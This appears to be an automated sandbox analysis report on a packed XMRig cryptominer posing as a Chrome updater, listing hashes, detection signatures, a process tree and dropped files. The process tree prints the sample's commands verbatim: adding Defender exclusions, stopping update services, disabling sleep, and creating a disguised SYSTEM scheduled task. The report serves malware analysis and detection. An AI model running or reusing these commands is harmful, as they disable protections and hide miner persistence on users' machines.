Analysis

  • max time kernel
    300s
  • max time network
    282s
  • platform
    windows10-1703_x64
  • resource
    win10-20230703-en
  • resource tags

    arch:x64arch:x86image:win10-20230703-enlocale:en-usos:windows10-1703-x64system
  • submitted
    02/08/2023, 03:48

General

  • Target

    87e3567cf024f369e6bbdf3def3f67d6fe56c8c68ee842bee2611e8ef59b875d.exe

  • Size

    9.7MB

  • MD5

    888f9ab3f2e7e689492fbe05019e4296

  • SHA1

    c6981bf46421e55c6ea2274f92a986ae5c98f46a

  • SHA256

    87e3567cf024f369e6bbdf3def3f67d6fe56c8c68ee842bee2611e8ef59b875d

  • SHA512

    1a8fe21cf8bd5708f7142297819020c86387761a82a6de389f3747980ffe839f637274c65bc89a0c22c0ae5a5512d774b48ada2a9dc837363b6e2bfac6c02204

  • SSDEEP

    196608:yVrXqC+rwTkY5bwvWZcni3sGbrTbwmBbhAYhKKjeluAgZ7vLb:cbqCZ7cWZci3xbrvJphAGWu5Vv/

Malware Config

Signatures

  • Suspicious use of NtCreateUserProcessOtherParentProcess 11 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner payload 23 IoCs
  • Drops file in Drivers directory 2 IoCs
  • Stops running service(s) 3 TTPs
  • Executes dropped EXE 1 IoCs
  • Themida packer 22 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Drops file in System32 directory 3 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Program Files directory 2 IoCs
  • Launches sc.exe 10 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Modifies data under HKEY_USERS 64 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 38 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:3240
      • C:\Users\Admin\AppData\Local\Temp\87e3567cf024f369e6bbdf3def3f67d6fe56c8c68ee842bee2611e8ef59b875d.exe
        "C:\Users\Admin\AppData\Local\Temp\87e3567cf024f369e6bbdf3def3f67d6fe56c8c68ee842bee2611e8ef59b875d.exe"
        2⤵
        • Suspicious use of NtCreateUserProcessOtherParentProcess
        • Drops file in Drivers directory
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Drops file in Program Files directory
        • Suspicious behavior: EnumeratesProcesses
        PID:4028
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3712
      • C:\Windows\System32\cmd.exe
        C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:864
        • C:\Windows\System32\sc.exe
          sc stop UsoSvc
          3⤵
          • Launches sc.exe
          PID:4888
        • C:\Windows\System32\sc.exe
          sc stop WaaSMedicSvc
          3⤵
          • Launches sc.exe
          PID:1860
        • C:\Windows\System32\sc.exe
          sc stop wuauserv
          3⤵
          • Launches sc.exe
          PID:1588
        • C:\Windows\System32\sc.exe
          sc stop bits
          3⤵
          • Launches sc.exe
          PID:2700
        • C:\Windows\System32\sc.exe
          sc stop dosvc
          3⤵
          • Launches sc.exe
          PID:2212
      • C:\Windows\System32\cmd.exe
        C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:2232
        • C:\Windows\System32\powercfg.exe
          powercfg /x -hibernate-timeout-ac 0
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:2252
        • C:\Windows\System32\powercfg.exe
          powercfg /x -hibernate-timeout-dc 0
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:1956
        • C:\Windows\System32\powercfg.exe
          powercfg /x -standby-timeout-ac 0
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:2404
        • C:\Windows\System32\powercfg.exe
          powercfg /x -standby-timeout-dc 0
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:980
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#adjkzr#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4348
      • C:\Windows\System32\schtasks.exe
        C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
        2⤵
          PID:4464
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
          2⤵
          • Drops file in System32 directory
          • Modifies data under HKEY_USERS
          • Suspicious behavior: EnumeratesProcesses
          PID:984
        • C:\Windows\System32\cmd.exe
          C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:1492
          • C:\Windows\System32\sc.exe
            sc stop UsoSvc
            3⤵
            • Launches sc.exe
            PID:1012
          • C:\Windows\System32\sc.exe
            sc stop WaaSMedicSvc
            3⤵
            • Launches sc.exe
            PID:4076
          • C:\Windows\System32\sc.exe
            sc stop wuauserv
            3⤵
            • Launches sc.exe
            PID:4892
          • C:\Windows\System32\sc.exe
            sc stop bits
            3⤵
            • Launches sc.exe
            PID:2148
          • C:\Windows\System32\sc.exe
            sc stop dosvc
            3⤵
            • Launches sc.exe
            PID:3424
        • C:\Windows\System32\cmd.exe
          C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:4468
          • C:\Windows\System32\powercfg.exe
            powercfg /x -hibernate-timeout-ac 0
            3⤵
              PID:2976
            • C:\Windows\System32\powercfg.exe
              powercfg /x -hibernate-timeout-dc 0
              3⤵
                PID:1484
              • C:\Windows\System32\powercfg.exe
                powercfg /x -standby-timeout-ac 0
                3⤵
                  PID:3996
                • C:\Windows\System32\powercfg.exe
                  powercfg /x -standby-timeout-dc 0
                  3⤵
                    PID:2168
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#adjkzr#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
                  2⤵
                  • Drops file in System32 directory
                  • Modifies data under HKEY_USERS
                  • Suspicious behavior: EnumeratesProcesses
                  PID:792
                • C:\Windows\System32\conhost.exe
                  C:\Windows\System32\conhost.exe
                  2⤵
                    PID:4136
                  • C:\Windows\explorer.exe
                    C:\Windows\explorer.exe
                    2⤵
                    • Suspicious behavior: EnumeratesProcesses
                    PID:1740
                • C:\Program Files\Google\Chrome\updater.exe
                  "C:\Program Files\Google\Chrome\updater.exe"
                  1⤵
                  • Suspicious use of NtCreateUserProcessOtherParentProcess
                  • Drops file in Drivers directory
                  • Executes dropped EXE
                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                  • Suspicious use of SetThreadContext
                  • Drops file in Program Files directory
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of WriteProcessMemory
                  PID:4112

                Network

                MITRE ATT&CK Enterprise v15

                Replay Monitor

                Loading Replay Monitor...

                Downloads

                • C:\Program Files\Google\Chrome\updater.exe

                  Filesize

                  9.7MB

                  MD5

                  888f9ab3f2e7e689492fbe05019e4296

                  SHA1

                  c6981bf46421e55c6ea2274f92a986ae5c98f46a

                  SHA256

                  87e3567cf024f369e6bbdf3def3f67d6fe56c8c68ee842bee2611e8ef59b875d

                  SHA512

                  1a8fe21cf8bd5708f7142297819020c86387761a82a6de389f3747980ffe839f637274c65bc89a0c22c0ae5a5512d774b48ada2a9dc837363b6e2bfac6c02204

                • C:\Program Files\Google\Chrome\updater.exe

                  Filesize

                  9.7MB

                  MD5

                  888f9ab3f2e7e689492fbe05019e4296

                  SHA1

                  c6981bf46421e55c6ea2274f92a986ae5c98f46a

                  SHA256

                  87e3567cf024f369e6bbdf3def3f67d6fe56c8c68ee842bee2611e8ef59b875d

                  SHA512

                  1a8fe21cf8bd5708f7142297819020c86387761a82a6de389f3747980ffe839f637274c65bc89a0c22c0ae5a5512d774b48ada2a9dc837363b6e2bfac6c02204

                • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                  Filesize

                  3KB

                  MD5

                  8592ba100a78835a6b94d5949e13dfc1

                  SHA1

                  63e901200ab9a57c7dd4c078d7f75dcd3b357020

                  SHA256

                  fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c

                  SHA512

                  87f98e6cb61b2a2a7d65710c4d33881d89715eb7a06e00d492259f35c3902498baabffc5886be0ec5a14312ad4c262e3fc40cd3a5cb91701af0fb229726b88c3

                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                  Filesize

                  1KB

                  MD5

                  a4882daef55eb82f30ad387f85085706

                  SHA1

                  07052dd70bf89dc8e9845556d079275979bfcafb

                  SHA256

                  148d85590431406d2a732d8a6078928e76aba51c53a2917391c29dd2b0d81a8a

                  SHA512

                  6cc9a4d9bce1b164f16cc687b8b997da4822f6b5d0bbb9f0a4abe848c08ca484839aac261da2d84ddd29ce3908b39331c8b2e1c9886da27932c8a8bca4af1488

                • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_yz42leh0.5se.ps1

                  Filesize

                  1B

                  MD5

                  c4ca4238a0b923820dcc509a6f75849b

                  SHA1

                  356a192b7913b04c54574d18c28d46e6395428ab

                  SHA256

                  6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

                  SHA512

                  4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

                • C:\Windows\System32\drivers\etc\hosts

                  Filesize

                  3KB

                  MD5

                  2d29fd3ae57f422e2b2121141dc82253

                  SHA1

                  c2464c857779c0ab4f5e766f5028fcc651a6c6b7

                  SHA256

                  80a60d7ec533d820de20bcedeb41319e7b1def548b6ea73ddbd69455bac4e7a4

                  SHA512

                  077a5c554663be7b71f181d961f5c98c732bc296dc015ffee30768a648bee3aad62c39c352cf2947432be19519906aeac7dfaf2557d309bb460732abb7fdbc68

                • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                  Filesize

                  3KB

                  MD5

                  811d351aabd7b708fef7683cf5e29e15

                  SHA1

                  06fd89e5a575f45d411cf4b3a2d277e642e73dbb

                  SHA256

                  0915139ab02088c3932bcc062ce22d4e9c81aa6df0eacd62900d73d7ad2d3b18

                  SHA512

                  702d847c2aa3c9526ddf34249de06e58f5e3182d6ef66f77ddbdbbd2e9836026da6eacac2c892cf186d79bdc227a85c14f493b746c03233ef8820d981721c70a

                • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                  Filesize

                  1KB

                  MD5

                  302a7c179ef577c237c5418fb770fd27

                  SHA1

                  343ef00d1357a8d2ff6e1143541a8a29435ed30c

                  SHA256

                  9e6b50764916c21c41d6e7c4999bdf27120c069ec7a9268100e1ce5df845149f

                  SHA512

                  f2472371a322d0352772defb959ea0a9da0d5ca8f412f6abafac2e6547bcc8a53394a6fb81b488521fc256bfc9f3205d92c6b69d6d139bdb260fb46578946699

                • memory/792-403-0x00007FFB6D4A0000-0x00007FFB6DE8C000-memory.dmp

                  Filesize

                  9.9MB

                • memory/792-686-0x00007FFB6D4A0000-0x00007FFB6DE8C000-memory.dmp

                  Filesize

                  9.9MB

                • memory/792-427-0x00007FF6B8B40000-0x00007FF6B8B50000-memory.dmp

                  Filesize

                  64KB

                • memory/792-522-0x000001A022630000-0x000001A022640000-memory.dmp

                  Filesize

                  64KB

                • memory/792-407-0x000001A022630000-0x000001A022640000-memory.dmp

                  Filesize

                  64KB

                • memory/792-406-0x000001A022630000-0x000001A022640000-memory.dmp

                  Filesize

                  64KB

                • memory/792-645-0x000001A03B100000-0x000001A03B11C000-memory.dmp

                  Filesize

                  112KB

                • memory/792-655-0x00007FFB6D4A0000-0x00007FFB6DE8C000-memory.dmp

                  Filesize

                  9.9MB

                • memory/792-668-0x000001A022630000-0x000001A022640000-memory.dmp

                  Filesize

                  64KB

                • memory/792-670-0x000001A022630000-0x000001A022640000-memory.dmp

                  Filesize

                  64KB

                • memory/792-521-0x000001A022630000-0x000001A022640000-memory.dmp

                  Filesize

                  64KB

                • memory/792-677-0x000001A022630000-0x000001A022640000-memory.dmp

                  Filesize

                  64KB

                • memory/984-363-0x000002BBBBEA0000-0x000002BBBBEB0000-memory.dmp

                  Filesize

                  64KB

                • memory/984-364-0x000002BBBBEA0000-0x000002BBBBEB0000-memory.dmp

                  Filesize

                  64KB

                • memory/984-306-0x000002BBBC110000-0x000002BBBC11A000-memory.dmp

                  Filesize

                  40KB

                • memory/984-273-0x000002BBBC2B0000-0x000002BBBC369000-memory.dmp

                  Filesize

                  740KB

                • memory/984-397-0x00007FFB6D4A0000-0x00007FFB6DE8C000-memory.dmp

                  Filesize

                  9.9MB

                • memory/984-267-0x000002BBBC0F0000-0x000002BBBC10C000-memory.dmp

                  Filesize

                  112KB

                • memory/984-266-0x00007FF6B8A10000-0x00007FF6B8A20000-memory.dmp

                  Filesize

                  64KB

                • memory/984-247-0x000002BBBBEA0000-0x000002BBBBEB0000-memory.dmp

                  Filesize

                  64KB

                • memory/984-245-0x000002BBBBEA0000-0x000002BBBBEB0000-memory.dmp

                  Filesize

                  64KB

                • memory/984-244-0x00007FFB6D4A0000-0x00007FFB6DE8C000-memory.dmp

                  Filesize

                  9.9MB

                • memory/1740-717-0x00007FF6DAB80000-0x00007FF6DB36F000-memory.dmp

                  Filesize

                  7.9MB

                • memory/1740-699-0x00007FF6DAB80000-0x00007FF6DB36F000-memory.dmp

                  Filesize

                  7.9MB

                • memory/1740-725-0x00007FF6DAB80000-0x00007FF6DB36F000-memory.dmp

                  Filesize

                  7.9MB

                • memory/1740-723-0x00007FF6DAB80000-0x00007FF6DB36F000-memory.dmp

                  Filesize

                  7.9MB

                • memory/1740-721-0x00007FF6DAB80000-0x00007FF6DB36F000-memory.dmp

                  Filesize

                  7.9MB

                • memory/1740-719-0x00007FF6DAB80000-0x00007FF6DB36F000-memory.dmp

                  Filesize

                  7.9MB

                • memory/1740-701-0x00007FF6DAB80000-0x00007FF6DB36F000-memory.dmp

                  Filesize

                  7.9MB

                • memory/1740-715-0x00007FF6DAB80000-0x00007FF6DB36F000-memory.dmp

                  Filesize

                  7.9MB

                • memory/1740-713-0x00007FF6DAB80000-0x00007FF6DB36F000-memory.dmp

                  Filesize

                  7.9MB

                • memory/1740-711-0x00007FF6DAB80000-0x00007FF6DB36F000-memory.dmp

                  Filesize

                  7.9MB

                • memory/1740-709-0x00007FF6DAB80000-0x00007FF6DB36F000-memory.dmp

                  Filesize

                  7.9MB

                • memory/1740-707-0x00007FF6DAB80000-0x00007FF6DB36F000-memory.dmp

                  Filesize

                  7.9MB

                • memory/1740-697-0x00007FF6DAB80000-0x00007FF6DB36F000-memory.dmp

                  Filesize

                  7.9MB

                • memory/1740-729-0x00007FF6DAB80000-0x00007FF6DB36F000-memory.dmp

                  Filesize

                  7.9MB

                • memory/1740-731-0x00007FF6DAB80000-0x00007FF6DB36F000-memory.dmp

                  Filesize

                  7.9MB

                • memory/1740-733-0x00007FF6DAB80000-0x00007FF6DB36F000-memory.dmp

                  Filesize

                  7.9MB

                • memory/1740-735-0x00007FF6DAB80000-0x00007FF6DB36F000-memory.dmp

                  Filesize

                  7.9MB

                • memory/1740-737-0x00007FF6DAB80000-0x00007FF6DB36F000-memory.dmp

                  Filesize

                  7.9MB

                • memory/1740-739-0x00007FF6DAB80000-0x00007FF6DB36F000-memory.dmp

                  Filesize

                  7.9MB

                • memory/1740-703-0x00007FF6DAB80000-0x00007FF6DB36F000-memory.dmp

                  Filesize

                  7.9MB

                • memory/1740-694-0x0000000000D40000-0x0000000000D60000-memory.dmp

                  Filesize

                  128KB

                • memory/1740-727-0x00007FF6DAB80000-0x00007FF6DB36F000-memory.dmp

                  Filesize

                  7.9MB

                • memory/1740-705-0x00007FF6DAB80000-0x00007FF6DB36F000-memory.dmp

                  Filesize

                  7.9MB

                • memory/3712-153-0x0000026C81530000-0x0000026C81540000-memory.dmp

                  Filesize

                  64KB

                • memory/3712-137-0x0000026C99D70000-0x0000026C99DE6000-memory.dmp

                  Filesize

                  472KB

                • memory/3712-135-0x0000026C81530000-0x0000026C81540000-memory.dmp

                  Filesize

                  64KB

                • memory/3712-134-0x00007FFB6D4A0000-0x00007FFB6DE8C000-memory.dmp

                  Filesize

                  9.9MB

                • memory/3712-131-0x0000026C99BC0000-0x0000026C99BE2000-memory.dmp

                  Filesize

                  136KB

                • memory/3712-178-0x00007FFB6D4A0000-0x00007FFB6DE8C000-memory.dmp

                  Filesize

                  9.9MB

                • memory/3712-174-0x0000026C81530000-0x0000026C81540000-memory.dmp

                  Filesize

                  64KB

                • memory/3712-136-0x0000026C81530000-0x0000026C81540000-memory.dmp

                  Filesize

                  64KB

                • memory/4028-121-0x00007FF7F2DD0000-0x00007FF7F3FEF000-memory.dmp

                  Filesize

                  18.1MB

                • memory/4028-123-0x00007FF7F2DD0000-0x00007FF7F3FEF000-memory.dmp

                  Filesize

                  18.1MB

                • memory/4028-122-0x00007FF7F2DD0000-0x00007FF7F3FEF000-memory.dmp

                  Filesize

                  18.1MB

                • memory/4028-124-0x00007FF7F2DD0000-0x00007FF7F3FEF000-memory.dmp

                  Filesize

                  18.1MB

                • memory/4028-120-0x00007FF7F2DD0000-0x00007FF7F3FEF000-memory.dmp

                  Filesize

                  18.1MB

                • memory/4028-118-0x00007FF7F2DD0000-0x00007FF7F3FEF000-memory.dmp

                  Filesize

                  18.1MB

                • memory/4028-119-0x00007FFB88E10000-0x00007FFB88FEB000-memory.dmp

                  Filesize

                  1.9MB

                • memory/4028-117-0x00007FF7F2DD0000-0x00007FF7F3FEF000-memory.dmp

                  Filesize

                  18.1MB

                • memory/4028-150-0x00007FF7F2DD0000-0x00007FF7F3FEF000-memory.dmp

                  Filesize

                  18.1MB

                • memory/4028-125-0x00007FF7F2DD0000-0x00007FF7F3FEF000-memory.dmp

                  Filesize

                  18.1MB

                • memory/4028-126-0x00007FFB88E10000-0x00007FFB88FEB000-memory.dmp

                  Filesize

                  1.9MB

                • memory/4028-227-0x00007FF7F2DD0000-0x00007FF7F3FEF000-memory.dmp

                  Filesize

                  18.1MB

                • memory/4028-228-0x00007FFB88E10000-0x00007FFB88FEB000-memory.dmp

                  Filesize

                  1.9MB

                • memory/4112-695-0x00007FFB88E10000-0x00007FFB88FEB000-memory.dmp

                  Filesize

                  1.9MB

                • memory/4112-233-0x00007FF639320000-0x00007FF63A53F000-memory.dmp

                  Filesize

                  18.1MB

                • memory/4112-230-0x00007FF639320000-0x00007FF63A53F000-memory.dmp

                  Filesize

                  18.1MB

                • memory/4112-693-0x00007FF639320000-0x00007FF63A53F000-memory.dmp

                  Filesize

                  18.1MB

                • memory/4112-652-0x00007FF639320000-0x00007FF63A53F000-memory.dmp

                  Filesize

                  18.1MB

                • memory/4112-239-0x00007FFB88E10000-0x00007FFB88FEB000-memory.dmp

                  Filesize

                  1.9MB

                • memory/4112-238-0x00007FF639320000-0x00007FF63A53F000-memory.dmp

                  Filesize

                  18.1MB

                • memory/4112-237-0x00007FF639320000-0x00007FF63A53F000-memory.dmp

                  Filesize

                  18.1MB

                • memory/4112-236-0x00007FF639320000-0x00007FF63A53F000-memory.dmp

                  Filesize

                  18.1MB

                • memory/4112-235-0x00007FF639320000-0x00007FF63A53F000-memory.dmp

                  Filesize

                  18.1MB

                • memory/4112-234-0x00007FF639320000-0x00007FF63A53F000-memory.dmp

                  Filesize

                  18.1MB

                • memory/4112-231-0x00007FF639320000-0x00007FF63A53F000-memory.dmp

                  Filesize

                  18.1MB

                • memory/4112-232-0x00007FFB88E10000-0x00007FFB88FEB000-memory.dmp

                  Filesize

                  1.9MB

                • memory/4136-702-0x00007FF72EF60000-0x00007FF72EF8A000-memory.dmp

                  Filesize

                  168KB

                • memory/4136-696-0x00007FF72EF60000-0x00007FF72EF8A000-memory.dmp

                  Filesize

                  168KB

                • memory/4348-225-0x00007FFB6D4A0000-0x00007FFB6DE8C000-memory.dmp

                  Filesize

                  9.9MB

                • memory/4348-222-0x000001F994D60000-0x000001F994D70000-memory.dmp

                  Filesize

                  64KB

                • memory/4348-203-0x000001F994D60000-0x000001F994D70000-memory.dmp

                  Filesize

                  64KB

                • memory/4348-187-0x000001F994D60000-0x000001F994D70000-memory.dmp

                  Filesize

                  64KB

                • memory/4348-186-0x000001F994D60000-0x000001F994D70000-memory.dmp

                  Filesize

                  64KB

                • memory/4348-184-0x00007FFB6D4A0000-0x00007FFB6DE8C000-memory.dmp

                  Filesize

                  9.9MB